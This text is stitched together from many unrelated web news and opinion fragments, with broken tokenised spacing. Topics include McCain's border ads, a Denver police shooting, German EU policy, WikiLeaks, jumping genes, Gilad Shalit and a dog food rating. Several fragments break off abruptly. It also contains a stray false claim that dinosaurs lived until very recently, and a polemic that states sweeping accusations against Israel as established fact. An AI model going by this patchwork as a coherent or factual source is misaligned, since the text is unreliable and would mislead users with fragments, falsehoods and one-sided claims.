Mr Sargeant said : " Whilst the odd comment or gesture may seem harmless enough , to the woman on the receiving end they can feel threatening and abusive .
" Any behaviour that intimidates a woman should not be tolerated .
If the campaign makes people stop and think then it will have served its purpose . "
Image caption Campaigners say social attitudes towards woman must be challenged
Paula Hardy , chief executive of Welsh Women 's Aid , said the campaign linked " everyday behaviours which demean women ( and the attitudes underlying these behaviours ) with the epidemic social problem of violence against women .
" The link is essentially gender inequality - which the assembly government now recognises as both a cause and a consequence of violence against women . "
Adele Baumgardt , Wales commissioner for the Women 's National Commission , said : " Gender discrimination affects women in Wales daily and can leave them feeling intimidated and even frightened .
" We need to change how men perceive women , challenge inappropriate attitudes and show men how damaging these can be .
I hope that this campaign will give victims the confidence to come forward and ask for help . "
Welsh Women 's Aid manages the Wales Domestic Abuse Helpline , a free bilingual service available 24 hours a day on 0808 80 10 800 .
John McCain Goes From Immigration Reform Advocate To Border Cop
Doug Mataconis · · 5 comments
The latest example of the extent to which John McCain has abandoned previous positions in the face of a strong primary challenge from J.D. Hayworth can be seen in this ad , which started running in Arizona this weekend :
McCain asks , “ Have we got the right plan ? ” referring to a “ McCain / Kyl Border Security Action Plan ” that flashes on the screen .
Babeu : “ Plan ’s perfect .
You bring troops , state and local law enforcement together . ”
McCain : “ And complete the danged fence . ”
And then this from Babeu : “ It ’ll work this time .
Senator , you ’re one of us . ”
( Then McCain stares into the camera in a freeze frame for five seconds . )
As Domenico Montanaro reminds us , this is very different from the John McCain we used to know :
From a March 30 , 2006 statement : “ There are over 11 million people in this country illegally .
They harvest our crops , tend our gardens , work in our restaurants , care for our children , clean our homes .
They came as others before them came , to grasp the lowest rung of the American ladder of opportunity , to work the jobs others wo n’t , and by virtue of their own industry and desire , to rise and build better lives for their families and a better America .
That is our history , Mr. President .
We are not a tribe .
We are not an ethnic conclave .
We are a nation of immigrants , and that distinction has been essential to our greatness . ”
From a Jan. 3 , 2004 New York Times op - ed : “ A simple crackdown aimed at sending all illegal immigrants back to where they came from would not work .
It would simply drive people without proper documentation deeper into the shadows , where they would continue to be at the mercy of unscrupulous employers and would be afraid to report crimes , send their children to school or seek treatment when they had infectious diseases . ”
Allahpundit sums it up best , I think :
Pandering is one thing , shameless careerist pandering is something else , and then there ’s John “ Goddamned Fence ” McCain marching along the border in a badass
Navy baseball cap looking like he could choke out a coyote with his bare hands .
Indeed .
I really do n’t know what else there is to say .
In the face of a stronger - than - expected challenge from the right from a candidate who has flirted with the birther movement and made rather bizarre comments about gay marriage , McCain has effectively abandoned any semblance of the politician he claimed to be in the past , even to the extent of denying that he had ever called himself a maverick .
It ’s really rather pathetic .
Update :
It actually gets worse .
As a comment at Hit & Run points out , the Sheriff ’s Deputy in the ad is from Pinal County , Arizona , which is some 85 miles away from the Mexican border .
One man died early this morning from multiple gunshot wounds fired by Denver police after he pulled a “ replica handgun ” on the officers , according to police spokesman John White .
White said the incident began after Denver dispatchers received a call at 12:48 a.m. from a caller in the 3100 block of West Louisiana Avenue alerting them to a man with a gun in the area .
White said officers contacted the caller and received the descriptions of two men , one of whom the witness said was armed with a handgun .
Within minutes , the officers located the two individuals near West Alabama Place and South Hooker Street .
There , said White , the officers gave repeated commands to the men .
One man obeyed the commands while the second man did n’t , said White .
At that point , the man who refused to obey pulled what appeared to be a handgun .
Two officers fired multiple times , hitting the man repeatedly , said White .
The wounded man later died at Denver Health Medical Center , said White .
The handgun was recovered at the scene and was found to be a replica handgun , not a working weapon , said White .
White said that the man who pulled the replica handgun was reportedly involved in an assault just minutes before he was shot by officers .
White said he did not know if the assault involved the caller who originally alerted police .
Larry Trujillo , a long - haul , over - the - road truck driver and Vietnam Army veteran who lives on West Alabama Place , said he had gotten up about 1 a .m. to open his bedroom windows and curtains to let fresh air into his house .
He saw two men walking eastbound on West Alabama directly in front of his house .
Trujillo said as two Denver squad cars pulled up behind the men and the officers got out , one of the men reached down to his waist and pulled out what appeared to be a handgun .
“ It looked like a real gun , ” said Trujillo .
“ I heard five shots and it was quick – boom , boom , boom , boom , boom !
The gentleman went down . ”
Trujillo said the officers acted appropriately .
“ It was either the officers or the gentleman .
It was a clean shooting .
It was justified , ” said Trujillo .
He said in the aftermath of the shooting , the second man sat on the grass just feet from where his companion had fallen , his head down .
Trujillo said in the seconds just before the shooting , he heard none of the people — either the officers or the two men — say anything .
Carl Faller , who lives at the intersection of South Hooker Street and West Alabama Place , said he was sound asleep when he heard five or six rapid shots , a pause , and then a final shot .
“ I ’ve never come out of my bed so fast after that gun went off , ” said Faller , a retired postal worker who has lived in the neighborhood since 1982 .
In the next few minutes , the area was flooded with police cars .
“ I ’ve never seen so many cop cars .
There were at least 10 , ” he said .
He said additional equipment arrived , including a large crime scene truck , which lit the area with flood lights .
Faller said that if somebody pulls a gun on an officer , the officer is n’t going to take the time to figure out if the gun is real or fake before defending himself .
Both Faller and his wife , Patricia , said the neighborhood has been quiet the past couple of years .
Prior to that , there was some trouble at an apartment complex on West Louisiana Avenue immediately to their south , but those problems have disappeared , they said .
Faller added that the officers who patrol the area seem nice and he exchanges greetings with them .
“ I have a lot of admiration for our police department , ” added Patricia Faller .
Faller said that about 50 yards down West Alabama Place from where the man fell , there appeared to be a second disturbance , but he could n’t see clearly what was going on .
White , the police spokesman , said the two officers , whose names are not being released , have been placed on paid administrative leave .
White said the second man who was cooperative prior to the shooting has remained cooperative .
His name is not being released .
Police are attempting to identify the deceased man , said the police spokesman .
The Denver district attorney ’s office will conduct an investigation into the shooting , said White .
Howard Pankratz : 303-954-1939 or hpankratz@denverpost.com
It is difficult to understand why anyone would take Mort Zuckerman seriously .
He is a New York based but Canadian born Israel firster who made a fortune in real estate before buying The New York Daily News and the US News and World Report .
He now fancies himself as a leading journalist and political commentator .
Zuckerman is frequently spotted on the television talking head circuit where he dispenses analysis of international events that could have been crafted in Tel Aviv or Herzliya , where the Israeli intelligence service Mossad has its headquarters .
Zuckerman ’s latest contribution to international harmony is a lengthy piece in the US News & World Report entitled “ Israel Is a Key Ally and Deserves US Support . ”
It is a propaganda piece that promotes one of the most persistent fictions put out by the mainstream media , that the relationship with Israel somehow benefits the United States .
To give the devil his due , it is not often that an article in a national publication includes an out - and - out lie in its first few words , but Zuckerman succeeds in doing just that .
As he is a smart man who went to Harvard Law School before becoming a propagandist for Israel , he must know that words have meanings .
But the significance of the word “ ally ” must have somehow eluded his grasp .
Israel is not now and never has been an ally of the United States .
As Zuckerman is a lawyer he should know that to be an ally requires an agreement in writing that spells out the conditions and reciprocity of the relationship .
Israel has never been an ally of any country because it would force it to restrain its aggressive behavior , requiring consultation with its ally before attacking other nations .
It is also unable to define its own borders , which have been expanding ever since it was founded in 1948 .
Without defined borders it is impossible to enter into an alliance because most alliances are established so that one country will come to the aid of another if it is attacked , which normally means having its territorial integrity violated .
Since Israel intends to continue expanding its borders it cannot commit to an alliance with anyone and has , in fact , rebuffed several bids by Washington to enter into some kind of formal arrangement .
The article ’s spin begins almost immediately thereafter in paragraph one , where the reader is informed that “ the Israelis have agreed to [ a Palestinian state ] in principle . ”
Zuckerman conveniently overlooks that Tel Aviv has in fact obstructed every move toward creation of a Palestinian state because that would stop its continued colonization of the West Bank and Jerusalem .
He then proceeds to lay it on really thick in the next two paragraphs , where one learns that the Palestinians need to “ do what the Israelis have done for decades , which is to declare … that both sides have genuine claims to this land , ” that the “ Palestinian leadership has all along made an honorable peace impossible , ” and that the Palestinians are not prepared to live with an Israeli state along their borders .
The Palestinians also “ beat the drums of hate ” and only the Israelis guarantee freedom of religion in Jerusalem .
Without wishing to be too contentious , it is safe to say that everything Zuckerman writes blaming the Palestinians can easily be disputed and should be challenged .
Zuckerman then launches into one of his major themes , that poor little Israel , always willing to take risks and do what is right in the cause of peace , has been betrayed by Washington .
Zuckerman opines that Tel Aviv is right to hold on to the West Bank because if it gives it up Israel will not be “ secure and defensible ” against Arab terrorism .
He also provides a hagiography of Prime Minister Bibi Netanyahu , who apparently is “ serious about making peace ” and has done lots of good things for the Palestinians that he is not given credit for ( except by Zuckerman ) .
Bibi is also reported to be “ disturbingly ” under - appreciated by the White House .
According to Zuckerman , Netanyahu and Israel are “ not to blame for trouble in the Middle East , ” and one also learns that “ The Islamists are not enemies of America because of Israel .
They are fighting America because they see the whole West … as antithetical to their own beliefs . ”
Yes , this is the new version of they hate us because of our freedom bumper sticker .
Israeli bestiality toward the Arab population that it dominates , seen on television nightly all over the world except in the US , has nothing to do with it .
After making sure that everyone knows who is completely to blame for the Middle East imbroglio , Zuckerman arrives at the argument that he knows will crush all opposition .
“ Israel has been an ally that has paid dividends exceeding its cost . ”
Zuckerman asserts that seventy per cent of Washington ’s military aid , now exceeding $ 3 billion per year , is used to buy equipment made in the USA , providing thousands of jobs and making sure that Lockheed and other struggling defense contractors do n’t go bust .
And the Israelis not only provide “ access to the Red Sea , ” they also permit US forces to stockpile equipment in Israel for contingencies .
Furthermore , Israel has been “ working jointly ” and “ cooperating ” with the US to protect America ’s troops all over the Middle East .
And then there is all that good intelligence that Tel Aviv hands over to Washington on the many bad guys in the Near East region .
Israeli tunnel vision means that most of the actual intelligence that Tel Aviv collects is on organizations that resent being occupied or bombed by Israel , not groups that actually threaten the US , a point ignored by Zuckerman .
And to those who argue that using billions of American taxpayers dollars to buy US military equipment for Israel is not necessarily money well spent in the middle of a financial crisis or that Washington ’s unlimited support for Tel Aviv is precisely the reason why the United States is in trouble around the world , Zuckerman delivers a final , devastating retort .
Israel has an unrivaled location on the Mediterranean .
Per Zuckerman
“ One analyst has described Israel as a ‘ strategic aircraft carrier ’ … ”
Well , Mort Zuckerman is certainly entitled to his own opinion and I suppose he can use the magazine he owns to spread Israeli hasbara , but the notion that Israel is some kind of strategic asset for the United States is nonsense , a complete fabrication .
Most recently , Chas Freeman has pointed out that Israel is useless for the projection of American power .
The US has numerous bases in Arab countries but is not allowed to use any military base in Israel .
Washington ’s own carrier groups and other forces in place all over the Middle East , including the Red Sea , have capabilities that far exceed those of the Israel Defense Forces .
Israel has never been a strategic asset or any asset at all , always a liability .
Even the stockpiles of US equipment in Israel are a typical bit of bonus support for Tel Aviv from Congress , placed there for the Israelis to use “ in emergencies ” while making it appear that they are for American forces .
The supplies are , in fact , regularly looted by the Israelis , leaving largely unusable or picked over equipment for US forces if it should ever be needed .
Make no mistake , Tel Aviv is always carefully calculating how it can use Washington to further its own objectives with little regard for possible American interests .
In 1967 the Israelis attacked the USS Liberty in international waters with the intention of sinking the ship and killing all the crew .
During the first Gulf War Israel had to be defended by the United States .
In the Cold War Israel spied aggressively on the US while cutting deals with both the Soviets and Chinese .
The intelligence provided by Israel that Zuckerman praises is generally fabricated and completely self serving , intended to shape a narrative about the Middle East that makes the Israelis look good and virtually everyone else look bad – ask any intelligence officer who has seen the stuff .
Israel as a key ally and security asset ?
A “ strategic aircraft carrier ” ?
Completely ridiculous .
SCHEVENINGEN , the Netherlands 
Over the years , France has built the November release of Beaujolais nouveau into a worldwide event , with wine drinkers eagerly snapping up bottles of what is , by most measures , a pedestrian wine .
So if it can be done for cheap wine , then why not for herring ?
The answer may seem self - evident , but not to the Dutch , who are trying to manage the same marketing feat with Hollandse Nieuwe ( pronounced HO - land - suh NYEW -uh ) , or new herring , which arrives in local waters in the month of June .
Traditions surrounding its appearance are as venerable as those of the French .
Throughout the Netherlands , people throw new - herring parties , sharing the fish with neighbors and friends .
For as long as anyone in this seaside resort , now a district of The Hague , can remember , the first barrel of new herring has been sold at public auction .
This year the barrel , with 45 filleted herring , went for $ 70,000 , or $ 1,555 for each herring , to Makro , a chain of discount retailers , which sent them to a local restaurant .
The money goes to charity , said Makro ’s managing director , Jean - Pierre Bienfait , every bit a Dutchman despite his French name , adding , “ Obviously , it ’s very symbolic for the new harvest . ”
So important are herring to Scheveningen that the town ’s coat of arms features three herring , each wearing a golden crown .
In the old days the herring boats went out for the first catch decorated with flags , so now in mid-June the town decks itself out around the fishing harbor for Flag Day , with old Dutch games like stilt - walking and can - throwing , townsfolk dressed in traditional dress and puppet shows in the old local dialect .
The first in - game Final Fantasy Versus XIII cutscene footage was shown at the 2008 Tokyo Game Show .
It 's now 2010 .
Let 's see the first gameplay images .
Advertisement
Final Fantasy Versus XIII In - Game Looks Like
This
At last year 's Tokyo Game Show , Square Enix screened an in - game Final Fantasy Versus XIII cut … Read more
The latest issue of Japanese game magazine Famitsu has details about the PS3 title 's gameplay .
While the title is set in the same universe as Final Fantasy XIII , Final Fantasy Versus XIII has a different visual look and feeling to it .
Advertisement
Versus XIII is an open world game , allowing players to go everywhere save for the mountains .
Players can drive around in a car , which they can exit and explore the area on foot .
Objects that are found on the road can be destroyed as well .
It is possible to see some of the enemies that are wandering around , but some enemies will suddenly appear and surprise players .
Advertisement
New Final Fantasy Versus XIII Details , Gameplay Shots Released [ Final Fantasy - XIII.net ]
- video encodings still in process -
This little tidbit is just the tip of the iceberg of the overwhelming amount of evidence that Dinosaurs inhabited the earth until only very recently .
The “ paradigm shift ” in German foreign policy
3 April 2010
A number of recent commentaries in the German press have expressed alarm over the course adopted by German Chancellor Angela Merkel regarding the Greek debt crisis .
At last week ’s meeting of European Union heads of state in Brussels , Merkel dictated terms and made clear that any financial support from Europe for Greece would be linked to punitive conditions and would be forthcoming only as a last resort .
While Merkel ’s stance has been hailed in a number of right - wing political commentaries and praised by Germany ’s tabloid press , other commentators have noted that it represents a fundamental shift in German foreign policy with far - reaching and potentially dangerous consequences .
The latest edition of Der Spiegel magazine poses the issue with the headline : “ How European is Angela Merkel ? Chancellor Abandons Post - War EU policy . ”
Applauding the role of “ Germany ’s great pro-European chancellors ” — the two conservatives Konrad Adenauer and Helmut Kohl and the Social Democrat Helmut Schmidt — the magazine describes Merkel ’s approach to the Greek debt crisis as a “ paradigm shift ” in German foreign policy , representing a fundamental break with the policies of her predecessors .
Previously , the magazine writes , the German chancellor ’s approach was to “ quietly and steadfastly pursue her interests in Brussels with the help of key partners or the European Commission ” .
Now , Der Spiegel remarks , Merkel has become “ the first chancellor to have abandoned this principle on an important issue .
She has made it clear that there are German interests and European interests , and that they are not necessarily the same ” .
The same point is made by Joschka Fischer , Germany ’s foreign minister and vice - chancellor from 1998 to 2005 and the leader of the German Green Party for almost 20 years , in a commentary published earlier this week in the Süddeutsche Zeitung .
In a piece entitled “ Frau Germania ” , Fischer asks , “ What is the matter with Angela Merkel ?
Only a short while ago , the German chancellor was celebrated as ‘ Ms. Europe ’ ; now she increasingly gives the impression of being Frau Germania .
Instead of providing resolute leadership in the global financial and economic crisis , the EU ’s largest economy is withdrawing into its shell ” .
Fischer points out that up to now Germany has been able to profit considerably from the process of European integration .
He writes , “ Germany has always been the motor of European integration , in accordance with its political and economic interests …
The motto was simple : Germany gives and profits in turn .
Should Germany spurn the first part of this formula , the European project would suffer serious damage — and so would German national interests .
Yet this is the direction in which Chancellor Merkel seems to be heading ” .
Fischer goes on to criticize Merkel ’s call for the expulsion of Eurozone members that do not meet financial criteria , and asks , “ Does she seriously believe that the euro and the EU would survive such punitive action ? ”
He also points out that Merkel ’s insistence on harsh austerity measures on the part of Greece and other Eurozone countries will prove detrimental to German interests , leading to “ deflation in these countries , which are the most important markets for German exports ” .
The main responsibility for the current conflict within the EU , according to Fischer , rests with Germany and France .
“ Rather than lead , the Franco - German couple is constantly , and publicly , at each other ’s throats .
While this quarrel is about who should pay for restructuring Greece , the real issue is the latent distrust between the two partners , which carries the danger of a permanent estrangement ” .
Fischer speaks on behalf of a layer of the German bourgeoisie that is eager to use the vacuum of power opened up by the decline of the US to increase German and European influence on the world stage .
In a speech at Humboldt University in Berlin in 2007 , Fischer had deplored “ Europe ’s growing insignificance in the world ” under conditions of “ the self - weakening of the United States due to its politics of unilateralism ” .
One year later , Fischer called for the establishment of a “ European avant - garde ” to advance the interests of German and European capitalism under conditions of mounting trade conflicts with the US on one side and China and the Asian countries on the other .
The motor for his “ avant - garde ” was to be a strong German - Franco axis .
Now Fischer is forced to acknowledge that his hopes of a harmonious union of European states have been dashed .
In the wake of the 2007 - 2008 financial crisis , naked national interests are increasingly dominating the political stage in Europe .
There are powerful economic factors behind this development .
The latest figures for labour costs provide an insight into the enormous economic gulf prevailing across the European continent .
With labour costs averaging € 30.9 per hour , Germany ranks seventh among European countries .
In Poland , a mere two hours drive eastwards from the German capital of Berlin , labour costs are nearly 80 percent cheaper at € 6.9 per hour .
EU member Bulgaria ranks last , with average hourly labour costs of € 2.9 .
At the same time , the financial crisis has led to a pronounced social polarization within individual countries .
These underlying economic differences are driving European nations apart and leading them to adopt increasingly nationalist policies .
The change in German policy towards Europe has profound political implications .
For over four decades , peace in Europe was linked to the division of the continent ’s leading industrial power , Germany , overseen by a powerful America on one side and the Stalinist bureaucracy in Moscow on the other .
The collapse of the Stalinist states , the end of the cold war and the weakened position of the United States have created the conditions for a reunited Germany to once again assert its interests on the world stage .
Fischer writes that the stance taken by Merkel represents withdrawal by Germany into its national shell , but there can be no retreat from the world market by the biggest and most export - oriented economy in Europe .
The powerful productive forces unleashed by a united Germany are forcing the German bourgeoisie to step out from behind the scenes and find a way to “ organise Europe ” more directly and nakedly in accordance with Germany ’s financial interests .
Twice in the last century , German expansionism was a decisive factor in drawing Europe and the world into war .
A renewed attempt at a forceful reorganisation of Europe by Germany will inevitably revive old antagonisms , with catastrophic consequences for the continent .
This underscores the necessity for the working class of Europe to advance its own independent perspective , based on the united struggle of European workers against the European bourgeoisie on the revolutionary program of the United Socialist States of Europe , in solidarity with the world working class .
Stefan Steinberg
Stefan Steinberg
Is Copenhagen home to the world 's greenest hotel ?
If being green means being ugly , then the Crowne Plaza Copenhagen Towers in Denmark seems happy to forgo prettiness .
Hotel goliath InterContinental is claiming their 366 - room hotel in the Danish capital is among the most eco-friendly accommodation anywhere in the world .
Sun beam : The Crowne Plaza Copenhagen Towers has solar panels covering its 85 - metre exterior .
The hotel is the largest solar panel building in northern Europe with a 85 metre exterior and roof made up entirely of energy - absorbing panels .
This alone generates approximately 170,000 kw /h of power every year and although it is n't quite enough to run the hotel , it is still a significant amount - consider that most European homes consume around 5,000 kw /h per year .
Keeping guests both warm and cool is powered by a groundwater - based heating system , which draws water from 100 metres below the hotel .
Using the earth beneath the building 's foundations as a source of both heat and ventilation , the system enables the hotel to be heated or cooled using around 90 per cent less energy than more conventional methods .
" Future hotel guests will require hotels to run their businesses and operations based on environmentally friendly principles , without compromising on modern comforts and luxury , " explains Mr. Allan L. Agerholm , the general manager .
" We have therefore made the decision to build the most environmentally friendly hotel building in Denmark - even the hand dryers in the public toilets have been selected based on their energy consumption . "
Energy saving lightbulbs and eco-friendly computers and kitchen equipment also add to the green glow .
More on eco-friendly hotels
The Proximity Hotel in North Carolina is regularly voted the world 's greenest hotel .
60 per cent of the hotel 's hot water is heated by 100 solar panels on the roof .
Before a hotel can officially call itself ' green ' it must meet current EU regulations that state emissions must be under 5.7 kg per guest per night .
Democrats Feature Joe Barton , Michelle Bachmann
In Ads Tying GOP To Defense Of BP
Doug Mataconis · · 3 comments
Congressman Joe Barton ’s clumsy , unnecessary , and politically stupid comments at Thursday ’s House Committee hearing have already been turned into a television ad :
Along the same lines , the Democrat faced with the unenviable task of running against Michelle Bachmann has come out with an ad featuring some of her comments :
It ’s not clear if this meme will go anywhere , but this is what happens when you give your opponents ammunition .
Amidst “ security concerns ” , the heroic Julian Assange has canceled a scheduled trip to speak today in Las Vegas after appearing remotely to a New York scheduled appearance , earlier in the week .
U.S. officials confirm the Defense Department is scrambling to discover his whereabouts .
Daniel Ellsburg and Philip Shenon discussed this today at “ The Dylan Ratigan Show ” on MSNBC ( 10:58 ) :
Pentagon investigators are searching for Julian Assange “ for fear that he may be about to publish a huge cache of classified State Department cables ” , according to “ government officials ” , Philip Shenon reported yesterday at The Daily Beast .
Mr. Assange — the Australian - born editor and founder of Wikileaks , a website devoted to being an outlet for whistleblowers to confidentially leak secret documents and information — “ says he ’s arranging the legal defense for 22 - year - old Bradley Manning , now in his third week in military custody ” , Kevin Poulson and Kim Zetter reported this afternoon at Wired .
Adrian Lamo , a hacker in contact with Spc. Manning , handed over chat logs where Spc. Manning disclosed that he had access to a wealth of confidential U.S. government documents and media ; also , that he leaked media and over a quarter - million diplomatic cables to Mr. Assange ’s site .
Spc. Manning is an intelligence analyst at the U.S. Army , stationed in Baghdad , Iraq being kidnapped by the military .
Among the media was the 2007 video of what ’s been dubbed as the “ West Baghdad Massacre ” , where well over a dozen civilians — including a Reuters photojournalist — were gunned down from a helicopter , firing “ indiscriminately ” .
Wikileaks released the video in April , under the title , Collateral Murder .
Another is video of a strike in which U.S. warplanes repeatedly dropped bombs , killing up to 147 civilians — including up to 95 children .
The operation has been dubbed the “ Granai Massacre ” and Mr. Assange has reported a video in his possession of a massacre in Afghanistan from 2009 , which is yet to be released , that his team is working on .
Wikileaks has yet to confirm whether or not Spc. Manning is their source .
Statements imply those affiliated with the site are not privy to the detailed identities of all of their sources , though would honor confidentiality if they were .
Mr. Shenon ’s added that Mr. Assange has no permanent residence and lawyers has advised him not to return to the U.S. :
The officials acknowledge that even if they found the website founder , Julian Assange , it is not clear what they could do to block publication of the cables on Wikileaks , which is nominally based on a server in Sweden and bills itself as a champion of whistleblowers .
American officials said Pentagon investigators are convinced that Assange is in possession of at least some classified State Department cables leaked by a 22 - year - old Army intelligence specialist , Bradley Manning of Potomac , Maryland , who is now in custody in Kuwait . [ … ]
The cables , which date back over several years , went out over interagency computer networks available to the Army and contained information related to American diplomatic and intelligence efforts in the war zones in Afghanistan and Iraq , the diplomat said . [… ]
Assange , who first gained notoriety as a computer hacker , is as secretive as his website and has no permanent home .
He was scheduled to speak Friday in Las Vegas at an International Reporters and Editors conference .
But the group ’s executive director , Mark Horvit , tells The Daily Beast that Assange canceled the appearance — he was on a panel to discuss anonymous sources — within the last several days as a result of unspecificed “ security concerns . ”
Horvit said he communicated with Assange through email and did not know where he might be .
Last week , Assange was scheduled to join famed Pentagon Papers leaker Daniel Ellsberg for a talk at New York ’s Personal Democracy Forum .
Assange appeared via Skype from Australia instead , saying lawyers recommended he not return to the United States . [ … ]
American officials were unwilling to say what would happen if Assange is tracked down , although they suggested they would have many more legal options available to them if he were still somewhere in the United States .
MORE :
Raffi Khatchdourian wrote an amazing profile last week of the heroic Mr. Assange and Wikileaks at The New Yorker .
Read it here .
Daniel Ellsburg , the former international security affairs official at the Pentagon who leaked “ The Pentagon Papers ” , discussed this week with Scott Horton at AntiWar Radio : the arrest of Spc. Manning and why he ought to be congratulated ; the negative connotation of the word , “ whistleblower ” , no matter how heroic the act of leaking government secrets ; and the Obama Administration ’s persecution of whistleblowers ( 33:12 ) :
http://scotthorton.org/radio/10_06_09_ellsberg.mp3
WASHINGTON ( Reuters ) - Stretches of DNA known as “ jumping ” genes are far more common than anyone thought , and almost everyone has a unique pattern of them , U.S. researchers reported on Thursday .
They also found an unexpectedly high number of these jumping genes , known as transposons , in lung tumors and said they may hold clues to the highly deadly cancer .
“ We found that if you have a child , the child could have one or more new copies of these transposons that you do n’t have , ” Scott Devine of the University of Maryland School of Medicine said in a statement .
“ From these findings , we predict that there is going to be more variation in human genomes than scientists first believed , ” added Devine , who led the research while at Emory University in Atlanta .
The findings could help fuel a revolution that scientists hope will lead to tailored medicine and far more targeted use of drugs and other therapies to treat and prevent disease .
Transposons are sequences in the DNA code that can replicate themselves .
They “ jump ” from one place to another on the chromosomes .
Devine ’s team found unique transposons in more than 90 percent of the 76 people they studied , they reported in the journal Cell .
These mutations can affect the functions of other genes .
Stretches of DNA right in front of or behind a gene can turn it on , turn it off , or affect the way it functions .
That people have transposons is not new .
“ Forty - five percent of the genome is known to be transposon sequences , ” Devine said .
But most hopped in and are now inactive , passing down unchanged and in place from one generation to the next .
“ What we are interested in are the ones that are moving around today .
We found an average of 15 new insertions per person , ” Devine said in a telephone interview .
CHEAPER NEW TECHNOLOGY
New genetic sequencing technology made it possible to find these transposons .
It costs thousands of dollars to map an individual ’s genome , the entire genetic sequence , but companies such as Illumina , Life Technologies , Roche and others are driving the price down .
Devine ’s team used Roche ’s 454 sequencer to find 1,145 new inserted transposons that had not been documented before .
They developed a genetic probe that would target only these active jumping genes and estimated a new insertion is happening with each generation .
The human genome has 3 billion so - called base pairs -- the A , C , T and G of the genetic code .
“ This could affect every base pair somewhere on the planet , ” Devine said .
“ What is that doing to people ?
You could imagine that doing a lot of things , causing diseases . ”
Each person has the same basic 20,000 genes , but each gene is made up of many base pairs and there are subtle changes unique to everyone .
In addition , DNA outside the genes affects the body in ways that are only beginning to be understood .
The transposons jump into these non-coding regions , but also sometimes into the genes .
“ If you think of the human genome as a manual to build a complex machine like an aircraft , imagine what would happen if you copied the page that describes passenger seats and inserted it into the section that describes jet engines , ” Devine said .
When they looked at brain and lung tumors , Devine ’s team found transposons seem to be especially busy in lung cancer but not brain cancer .
One of the many next steps will be to understand why this is .
The Environmental Protection Agency unveiled a final rule on Thursday for regulating major emitters of greenhouse gases , like coal - fired power plants , under the Clean Air Act .
Starting in July 2011 , new sources of at least 100,000 tons of greenhouse gases a year and any existing plants that increase emissions by 75,000 tons will have to seek permits , the agency said .
In the first two years , the E.P.A. expects the rule to affect about 15,550 sources , including coal - fired plants , refineries , cement manufacturers , solid waste landfills and other large polluters , said Gina McCarthy , the agency ’s assistant administrator .
She said the rule would apply to sites accounting for about 70 percent of the nation ’s greenhouse gas emissions .
“ We think this is smart rule - making , and we think it ’s good government , ” she said .
Hamas has rejected the latest request from the International Red Cross to visit abducted Israel Defense Forces soldier Gilad Shalit , Israel Radio reported on Wednesday .
Open gallery view IDF soldier Gilad Shalit , captured by Hamas in 2006 .
Credit : Archive
Hamas denied the request for fear that the visit might lead Israel to try to free Shalit in a military operation , according to Hamas lawmaker Yehia Moussa , who told a Hamas newspaper that the Red Cross did not take the military reality in the Middle East into account when it made the request .
The International Committee of the Red Cross said it has approached Hamas a number of times to allow its representatives to visit the kidnapped soldier in Gaza , only to be denied time after time .
" One of our main achievements is that we have been able to visit nearly everyone detained in connection to this conflict , with the exception of Gilad Shalit , " Pierre Dorbes , deputy head of the International Committee of the Red Cross in Israel and the Occupied Territories , told Haaretz on Tuesday .
Meanwhile , Shalit 's grandfather , Zvi Shalit , met with Prime Minister Netanyahu in Jerusalem Tuesday .
Following the meeting , which was also attended by top Shalit negotiator Haggai Hadas as well as Netanyahu 's military secretary , Brig .
Gen. Yohanan Locker , the 85 - year - old told Haaretz that the meeting was strained and fraught with disagreements .
Open gallery view Zvi Shalit after a meetnig with PM Benjamin Netantyahu , June 22 , 2010 .
Credit : Tomer Appelbaum
The elder Shalit had to wait for three hours before Netanyahu was able to see him , as the prime minister 's schedule shifted around the budget votes .
" I spoke [ to Netanyahu ] as a human being and as a grandfather who wants to see his grandson return home after four years [ in captivity ] .
I told Netanyahu the conduct over this matter was not satisfactory and he said that yes , it was , " he added .
Although Netanyahu did not issue a statement about the content of the meeting , nor did he allow photographers to be present , his office did comment Tuesday on the three - hour delay in the meeting .
Open gallery view Gilad Shalit ’s parents , Aviva , center , and Noam , right , with Hen Arad , the brother of Israeli airman Ron Arad , in the Knesset Monday .
Credit : Emil Salman
Next week , the Shalits are hoping to join thousands of supporters , including supermodel Bar Refaeli and dozens of other local celebrities , on a cross-country march for Gilad 's release .
The Israel Philharmonic Orchestra is holding a special concert near the Gaza border — conducted by renowned conductor Zubin Mehta — to call for Shalit 's release .
Shalit 's parents have pledged to camp outside the prime minister 's residence until their son is freed from captivity .
Natura Dog Food
Dropped From 10 Best Dog Food List
Downgraded to 2 Scoops
Like most of the pet community , we are very saddened by Natura Dog Food 's sellout to Procter & Gamble .
Natura Dog Food Brands
Natura Dog Food - Summary
Proctor & Gamble - A Snapshot of a Corporate Giant
Procter & Gamble – A Probing Look at Corporate Ethics
Iams and Eukanuba Dog Foods
" emphatic commitment to maintaining the premium quality of Iams and Eukanuba dog and cat foods "
" any product changes that occured were designed to enhance the product "
" reformulated its dog food ingredients ' to enhance ' the formula -- substituting chicken for ' chicken by - products meal ' and a ' carbohydrate blend ' of bran sorghum and barley for rice .
It then adjusted its package instructions to reduce per-day servings by 25 percent to reflect scientific evidence , it says , that in - home dogs are 25 percent less active than kennel dogs -- the basis of most dog food formulations . "
Actonel Osteoporosis Medication
" P&G failed to realize its ambition of becoming a major force in pharmaceuticals , although Actonel became one of the world 's top - selling treatments for prevention of fractures in post - menopausal women
... Cincinnati - based P&G , best known for its vast array of household consumer products such as Tide detergent and Crest toothpaste , said it is selling its branded medicines to " prioritize " investments in its consumer health - care businesses . ”
" mounting pressure and negative publicity , P&G launched a public relations campaign intended to salvage their reputation .
The company first issued the researcher 's ' Bill of Rights , ' which stated researchers would have access to all information about which they are writing .
Finally , P&G released Actonel 's full data sets to Blumsohn , a tremendous victory for Blumsohn and GAP .
The full data sets verified Blumsohn 's suspicions and
. ”
Animal Cruelty Allegations
We have totally re-evaluated our dog food reviews and ratings of the one time premium dog food manufacturer .
For the moment , we are ranking Natura 2 Scoops , and in all likelihood we will downgrade them even further in the near future .
Here ’s a walk - through of how we arrived at our decision .
On June 1 , 2010 , Natura Pet Products finalized the sale of their business to Proctor and Gamble ( P&G ) , the world ’s largest manufacturer of household products .
The brands of premium , all natural dog food made by Natura Dog Food are : Innova , Evo , California Natural , HealthWise , and Karma Organic Dog Food ( made with over 95 % organic ingredients ) .
Each of these brands were exceptionally high quality dog foods , and Natura Pet Foods was by all accounts a trusted and highly - respected pet food manufacturer .
We had originally rated all Natura Dog Food brands a 5 Scoop dog food ranking , and even included three of their products , California Natural , Evo and Innova dog foods on our list of 10 Best Dog Food Brands .
P&G is a massive multinational corporation headquartered in Cincinnati , Ohio .
Approximately 135,000 employees work in about 80 countries worldwide .
